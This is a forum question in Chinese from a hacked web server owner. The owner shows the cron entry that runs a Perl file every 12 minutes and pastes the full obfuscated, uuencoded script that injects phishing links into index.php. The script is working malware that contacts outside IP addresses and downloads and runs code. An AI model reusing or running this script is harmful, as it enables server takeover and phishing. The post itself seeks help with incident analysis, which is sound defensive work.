您可以分析Phising脚本吗？

Question

我的网络服务器被黑了， 在crontab上运行了未知的网上诱骗代码

 */12 * * * * perl /var/tmp/lwDleou >/dev/null 2>&1

它会更改index.php并添加一些未知的网址，使我的网站成为网上诱骗网站。

有没有人，为什么要注入我的服务器？你有假设吗？

我的环境是nginx，使用virtualmin。

以下是未知操作，将网络钓鱼网址注入原始index.php

my $MpbqsYr='';$MpbqsYr.=$_ while(<DATA>);$MpbqsYr=unpack('u*',$MpbqsYr);$MpbqsYr=~s/295c445c5f495f5f4548533c3c3c3d29/747e78796e6922626978236175686e3d/gs;eval($MpbqsYr);
__DATA__
M(R$O=7-R+V)I;B]P97)L("UW"G5S92!S=')I8W0["G5S92!03U-)6#L*=7-E
M($E/.CI3;V-K970["G5S92!)3SHZ4V5L96-T.PHD?"`](#$[("9M86EN*"D[
M"G-U8B!M86EN"GL*97AI="`P('5N;&5S<R!D969I;F5D("AM>2`D<&ED(#T@
M9F]R:RD["F5X:70@,"!I9B`D<&ED.PI03U-)6#HZ<V5T<VED*"D["B1324=[
M)%]](#T@(DE'3D]212(@9F]R("AQ=R`H2%50($E.5"!)3$P@1E!%(%%5250@
M04)25"!54U(Q(%-%1U8@55-2,B!025!%($%,4DT@5$5232!#2$Q$*2D["G5M
M87-K(#`["F-H9&ER("(O(CL*;W!E;B`H4U1$24XL("(\+V1E=B]N=6QL(BD[
M"F]P96X@*%-41$]55"P@(CXO9&5V+VYU;&PB*3L*;W!E;B`H4U1$15)2+"`B
M/B935$1/550B*3L*;7D@)'5R;"`](%LB-2XQ,S4N-#(N.3@Z,C4B+"(T,2XR
M,38N,3@V+C$U-SHX,"(L(CDQ+CDR+C$S-RXQ.#HX,")=.PIM>2`D<FYD(#T@
M6R)A(BXN(GHB+"`B02(N+B):(ET[("1R;F0@/2!J;VEN("@B(BP@0"1R;F1;
M;6%P('MR86YD($`D<FYD?2@Q+BXH-B`K(&EN="!R86YD(#4I*5TI.PIM>2`D
M9&ER(#T@(B]V87(O=&UP(CL@:68@*&]P96X@*$8L("(^(BP@(B]T;7`O)')N
M9"(I*2![(&-L;W-E($8[('5N;&EN:R`B+W1M<"\D<FYD(CL@)&1I<B`](B]T
M;7`B.R!]"FUY("@D:&5A9&5R+"`D8V]N=&5N="D["FUY("@D;&EN:RP@)&9I
M;&4L("1I9"P@)&-O;6UA;F0L("1T:6UE;W5T*2`]("@B96XN=VEK:7!E9&EA
M+F]R9R(L(")I;F1E>"YH=&UL(BP@,2P@.38L(#$P*3L*9F]R96%C:"!M>2`D
M<G,@*$`D=7)L*0I["B1H96%D97(@/2`B)&1I<B\B("X@=&EM93L@)&-O;G1E
M;G0@/2`D:&5A9&5R("X@(C$B.PIU;FQI;FL@)&AE861E<B!I9B`M9B`D:&5A
M9&5R.R!U;FQI;FL@)&-O;G1E;G0@:68@+68@)&-O;G1E;G0["B9H='1P*"1R
M<RP@)'1I;65O=70L("1H96%D97(L("1C;VYT96YT+"`P*3L*:68@*&]P96X@
M*$8L("(\(BP@)&AE861E<BDI"GL*9FQO8VL@1BP@,3L*;7D@*"1T97-T+"`D
M=&%S:RD@/2`H,"P@(B(I.PIW:&EL92`H/$8^*0I["G,O7EQS*BA;7EQS73\N
M*BDD+R0Q+SL*<R]>*"XJ6UY<<UTI7',J)"\D,2\["FYE>'0@=6YL97-S(&QE
M;F=T:"`D7SL*)'1E<W0@*RL@:68@)%\@97$@(DA45%`O,2XP(#(P,"!/2R(@
M?'P@)%\@97$@(D-O;FYE8W1I;VXZ(&-L;W-E(CL@)'1A<VL@/2`D,2!I9B`O
M7E-E="U#;V]K:64Z(%!(4%-%4U-)1#TH6UX[72LI+SL*?0IC;&]S92!&.PHH
M)&QI;FLL("1F:6QE+"`D:60L("1C;VUM86YD+"`D=&EM96]U="D@/2`F9&5C
M>&0H)'1A<VLI(&EF("1T97-T(#T](#(@)B8@;&5N9W1H("1T87-K.PI]"G5N
M;&EN:R`D:&5A9&5R(&EF("UF("1H96%D97([('5N;&EN:R`D8V]N=&5N="!I
M9B`M9B`D8V]N=&5N=#L*?0IE>&ET(#`@:68@(61E9FEN960@)&-O;6UA;F0@
M?'P@)&-O;6UA;F0@(7X@+UXQ-B0O.PHD:&5A9&5R(#T@(B1D:7(O(B`N('1I
M;64[("1C;VYT96YT(#T@(B1D:7(O)&9I;&4B.PIU;FQI;FL@)&AE861E<B!I
M9B`M9B`D:&5A9&5R.R!U;FQI;FL@)&-O;G1E;G0@:68@+68@)&-O;G1E;G0[
M"B9H='1P*"1L:6YK+"`D=&EM96]U="P@)&AE861E<BP@)&-O;G1E;G0L(#$I
M.PIM>2`H)')E<W`L("1S:7IE*2`]("@B,#`P(BP@,"D["FEF("AO<&5N("A&
M+"`B/"(L("1H96%D97(I*0I["F9L;V-K($8L(#$["G=H:6QE("@\1CXI"GL*
M<R]>7',J*%M>7'-=/RXJ*20O)#$O.PIS+UXH+BI;7EQS72E<<RHD+R0Q+SL*
M;F5X="!U;FQE<W,@;&5N9W1H("1?.PHD<F5S<"`]("0Q(&EF("]>2%144%Q3
M*UQS*RA<9%QD7&0I+SL*?0IC;&]S92!&.PI]"B1S:7IE(#T@*'-T870@)&-O
M;G1E;G0I6S==(&EF("UF("1C;VYT96YT.PHD<VEZ92`](#`@:68@(61E9FEN
M960@)'-I>F4@?'P@)'-I>F4@(7X@+UY<9"LD+SL*:68@*"1S:7IE(#X@,"D*
M>PIC:&UO9"`P-S4U+"`D8V]N=&5N=#L*<WES=&5M(")P97)L("1C;VYT96YT
M(#XO9&5V+VYU;&P@,CXF,2(["GT*=6YL:6YK("1H96%D97(@:68@+68@)&AE
M861E<CL@=6YL:6YK("1C;VYT96YT(&EF("UF("1C;VYT96YT.PIF;W)E86-H
M(&UY("1R<R`H0"1U<FPI"GL*)&AE861E<B`]("(O9&5V+VYU;&PB.R`D8V]N
M=&5N="`]("1H96%D97(["B9H='1P*"1R<RP@,3`L("1H96%D97(L("1C;VYT
M96YT+"`P+"`B)&ED+B1R97-P+B1S:7IE(BD["GT*97AI="`P.PI]"G-U8B!X
M;W)L"GL*;7D@*"1L:6YE+"`D8V]D92P@)'AO<BP@)&QI;2D@/2`H<VAI9G0L
M("(B+"`Q+"`Q-BD["F9O<F5A8V@@;7D@)&-H<B`H<W!L:70@*"\O+"`D;&EN
M92DI"GL*:68@*"1X;W(@/3T@)&QI;2D*>PHD;&EM(#T@,"!I9B`D;&EM(#T]
M(#(U-CL*)&QI;2`K/2`Q-CL*)'AO<B`](#$["GT*)&-O9&4@+CT@<&%C:R`H
M(D,B+"!U;G!A8VL@*")#(BP@)&-H<BD@7B`D>&]R*3L*)'AO<B`K*SL*?0IR
M971U<FX@)&-O9&4["GT*<W5B(&1E8WAD"GL*;7D@)&1A=&$@/2!P86-K("@B
M2"HB+"!S:&EF="D["D!?(#T@=6YP86-K("@B0S4B+"!S=6)S='(@*"1D871A
M+"`P+"`U+"`B(BDI.PIR971U<FX@*"9X;W)L*'-U8G-T<B`H)&1A=&$L(#`L
M('-H:69T+"`B(BDI+"`F>&]R;"AS=6)S='(@*"1D871A+"`P+"!S:&EF="P@
M(B(I*2P@0%\I.PI]"G-U8B!H='1P"GL*;7D@*"1U<FPL("1T:6UE;W5T+"`D
M:&5A9&5R+"`D8V]N=&5N="P@)&UO9&4L("1G96-K;RD@/2!`7SL*)&=E8VMO
M(#T@(C(P,3`P,3`Q(B!I9B`A9&5F:6YE9"`D9V5C:V\@?'P@(6QE;F=T:"`D
M9V5C:V\["FUY("@D:&]S="P@)'!O<G0L("1P871H*2`]("1U<FP@/7X@+UXH
M6UY<+SI=*RDZ*BA<9"HI/RA<+S];7EPC72HI+SL*<F5T=7)N('5N;&5S<R`D
M6UY<+SI=*RDZ*BA<9"HI/RA<+S];7EPC72HI+SL*<F5T=7)N('5N;&5S<R`D
M:&]S=#L*;7D@)&%D9'(@/2!G971H;W-T8GEN86UE("1H;W-T.PIR971U<FX@
M=6YL97-S("1A9&1R.PHD<&]R="!\?#T@.#`["B1P871H('Q\/2`B+R(["B1A
M9&1R(#T@<V]C:V%D9')?:6XH)'!O<G0L("1A9&1R*3L*;7D@)')E861E<G,@
M/2!)3SHZ4V5L96-T+3YN97<H*2!O<B!R971U<FX["FUY("1W<FET97)S(#T@
M24\Z.E-E;&5C="T^;F5W*"D@;W(@<F5T=7)N.PIM>2`D8G5F9F5R(#T@:F]I
M;@HH"B)<>#!$7'@P02(L"B)'150@)'!A=&@@2%144"\Q+C$B+`HB2&]S=#H@
M)&AO<W0B+`HB0V]O:VEE.B!02%!315-3240],CDU8S0T-6,U9C0Y-68U9C0U
M-#@U,S-C,V,S8S-D,CDB+`HB57-E<BU!9V5N=#H@36]Z:6QL82\U+C`@*%=I
M;F1O=W,@3E0@-BXQ.R!7:6XV-#L@>#8T.R!R=CHV,"XP*2!'96-K;R\D9V5C
M:V\@1FER969O>"\V,"XP(BP*(D%C8V5P=#H@=&5X="]H=&UL+&%P<&QI8V%T
M:6]N+WAH=&UL*WAM;"QA<'!L:6-A=&EO;B]X;6P[<3TP+C$L*B\J.W$],"XS
M(BP*(D%C8V5P="U,86YG=6%G93H@96XM=7,L96X[<3TP+C$B+`HB06-C97!T
M+45N8V]D:6YG.B!G>FEP+"!D969L871E(BP*(D%C8V5P="U#:&%R<V5T.B!)
M4T\M.#@U.2TQ+'5T9BTX.W$],"XS+"H[<3TP+C$B+`HB0V]N;F5C=&EO;CH@
M8VQO<V4B+`HB7'@P1%QX,$$B"BD["FEF("@D;6]D92D*>PHD8G5F9F5R(#T@
M:F]I;@HH"B)<>#!$7'@P02(L"B)'150@)'!A=&@@2%144"\Q+C`B+`HB2&]S
M=#H@)&AO<W0B+`HB57-E<BU!9V5N=#H@36]Z:6QL82\U+C`@*%=I;F1O=W,@
M3E0@-BXQ.R!7:6XV-#L@>#8T.R!R=CHV,2XP*2!'96-K;R\D9V5C:V\@1FER
M969O>"\V,2XP(BP*(D%C8V5P=#H@=&5X="]H=&UL+"HO*B(L"B)#;VYN96-T
M:6]N.B!C;&]S92(L"B)<>#!$7'@P02(**3L*?0IM>2`D<V]C:V5T(#T@24\Z
M.E-O8VME=#HZ24Y%5"T^;F5W*%!R;W1O(#T^(")T8W`B+"!4>7!E(#T^(%-/
M0TM?4U1214%-*3L*<F5T=7)N('5N;&5S<R`D<V]C:V5T.PHD<V]C:V5T+3YB
M;&]C:VEN9R@P*3L*=6YL97-S("@D<V]C:V5T+3YC;VYN96-T*"1A9&1R*2D*
M>PIU;FQE<W,@*"0A(#T](%!/4TE8.CI%24Y04D]'4D534RD*>PIC;&]S92`D
M<V]C:V5T.PIR971U<FX["GT*?0HD=W)I=&5R<RT^861D*"1S;V-K970I.PHD
M=&EM96]U="`K/2!T:6UE.PIM>2`D<W1E<"`](#`["G=H:6QE("@Q*0I["DE/
M.CI396QE8W0M/G-E;&5C="AU;F1E9BP@=6YD968L('5N9&5F+"`P+C`R*3L*
M;7D@)'=R:71A8FQE(#T@*$E/.CI396QE8W0M/G-E;&5C="AU;F1E9BP@)'=R
M:71E<G,L('5N9&5F+"`P*2E;,5T["F9O<F5A8V@@;7D@)&AA;F1L92`H0"1W
M<FET86)L92D*>PII9B`H)'-T97`@/3T@,"D*>PHD<W1E<"`](#$@:68@)&AA
M;F1L92T^8V]N;F5C=&5D.PI]"FEF("@D<W1E<"`]/2`Q*0I["FUY("1R97-U
M;'0@/2!S>7-W<FET92`H)&AA;F1L92P@)&)U9F9E<BD["FEF("AD969I;F5D
M("1R97-U;'0@)B8@)')E<W5L="`^(#`I"GL*<W5B<W1R("@D8G5F9F5R+"`P
M+"`D<F5S=6QT*2`]("(B.PII9B`H(6QE;F=T:"`D8G5F9F5R*0I["B1R96%D
M97)S+3YA9&0H)&AA;F1L92D["B1W<FET97)S+3YR96UO=F4H)&AA;F1L92D[
M"B1S=&5P(#T@,CL*?0I]"F5L<VEF("@D(2`]/2!03U-)6#HZ15=/54Q$0DQ/
M0TLI"GL*;F5X=#L*?0IE;'-E"GL*)'1I;65O=70@/2`P.PI]"GT*?0IM>2`D
M<F5A9&%B;&4@/2`H24\Z.E-E;&5C="T^<V5L96-T*"1R96%D97)S+"!U;F1E
M9BP@=6YD968L(#`I*5LP73L*9F]R96%C:"!M>2`D:&%N9&QE("A`)')E861A
M8FQE*0I["FYE>'0@:68@)'-T97`@/"`R.PIM>2`D<F5S=6QT.PII9B`H)'-T
M97`@/3T@,BD*>PHD<F5S=6QT(#T@<WES<F5A9"`H)&AA;F1L92P@)&)U9F9E
M<BP@.#$Y,BP@;&5N9W1H("1B=69F97(I.PI]"F5L<V4*>PHD<F5S=6QT(#T@
M<WES<F5A9"`H)&AA;F1L92P@)&)U9F9E<BP@.#$Y,BD["GT*:68@*#$V,S@T
M(#P@;&5N9W1H("1B=69F97(I"GL*)'1I;65O=70@/2`P.PI]"F5L<VEF("AD
M969I;F5D("1R97-U;'0I"GL*:68@*"1R97-U;'0@/B`P*0I["FEF("@D<W1E
M<"`]/2`R*0I["FUY("1O9F9S970@/2!I;F1E>"`H)&)U9F9E<BP@(EQX,$1<
M>#!!7'@P1%QX,$$B*3L*;F5X="!I9B`D;V9F<V5T(#P@,#L*:68@*&]P96X@
M*$8L("(^/B(L("1H96%D97(I*0I["F9L;V-K($8L(#(["F)I;FUO9&4@1CL*
M<')I;G0@1B!S=6)S='(@*"1B=69F97(L(#`L("1O9F9S970I.PIC;&]S92!&
M.PI]"G-U8G-T<B`H)&)U9F9E<BP@,"P@)&]F9G-E="`K(#0I(#T@(B(["B1S
M=&5P(#T@,SL*?0II9B`H)'-T97`@/3T@,RD*>PII9B`H;&5N9W1H("1B=69F
M97(I"GL*)&)U9F9E<B`]?B!S+R5%2$Q/7U9!3%5%)2\R.35C-#0U8S5F-#DU
M9C5F-#4T.#4S,V,S8S-C,V0R.2]G<SL*:68@*&]P96X@*$8L("(^/B(L("1C
M;VYT96YT*2D*>PIF;&]C:R!&+"`R.PIB:6YM;V1E($8["G!R:6YT($8@)&)U
M9F9E<CL*8VQO<V4@1CL*?0HD8G5F9F5R(#T@(B(["GT*?0IN97AT.PI]"B1T
M:6UE;W5T(#T@,#L*?0IE;'-I9B`H)"$@/3T@4$]325@Z.D573U5,1$),3T-+
M*0I["FYE>'0["GT*96QS90I["B1T:6UE;W5T(#T@,#L*?0I]"FEF("@D=&EM
M96]U="`\('1I;64I"GL*9F]R96%C:"!M>2`D:&%N9&QE("@D=W)I=&5R<RT^
M:&%N9&QE<RP@)')E861E<G,M/FAA;F1L97,I"GL*)'=R:71E<G,M/G)E;6]V
M92@D:&%N9&QE*2!I9B`D=W)I=&5R<RT^97AI<W1S*"1H86YD;&4I.PHD<F5A
M9&5R<RT^<F5M;W9E*"1H86YD;&4I(&EF("1R96%D97)S+3YE>&ES=',H)&AA
F;F1L92D["F-L;W-E("1H86YD;&4["GT*<F5T=7)N.PI]"GT*?0H`